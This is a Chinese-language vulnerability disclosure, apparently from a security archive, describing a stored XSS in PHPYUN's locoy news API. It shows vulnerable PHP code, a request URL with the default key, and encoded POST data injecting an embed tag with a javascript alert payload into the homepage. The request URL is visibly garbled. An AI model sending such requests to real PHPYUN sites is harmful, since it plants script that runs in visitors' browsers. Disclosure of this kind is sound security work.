PHPYUN绕过Webscan向主页推送XSS招聘信息

### 简要描述： PHPYUN绕过Webscan向主页推送XSS招聘信息 ### 详细说明： api/locoy/model/news.class.php: ``` class news_controller extends common{ function addnews_action(){//新闻添加 include("locoy_config.php"); if($locoyinfo['locoy_online']!=1){ echo 4;die; } if($locoyinfo['locoy_key']!=trim($_GET['key'])){ echo 5;die; } if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){ echo 2;die; } $row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'"); if(is_array($row)){ echo 3;die; } $content=$_POST['content']; ``` 发送url： http://localhost/phpyun40https://images.seebug.org/upload/api/locoy/index.php?admin_dir=admin&m=news&c=addnews&key=phpyun postdata: title=%D7%EE%D0%C2%D5%D0%C6%B8&color=%23E53333&content=%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%2f%3E&nid=511112671&keyword=xxxxxx 查看主页： [<img src="https://images.seebug.org/upload/201507/2322292073fd8267a4252df7dd2effcd59611387.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/2322292073fd8267a4252df7dd2effcd59611387.png) 点击查看招聘信息,出发XSS [<img src="https://images.seebug.org/upload/201507/23222943f890678f1cd89c4610adcecfbcd7982b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/23222943f890678f1cd89c4610adcecfbcd7982b.png) ### 漏洞证明：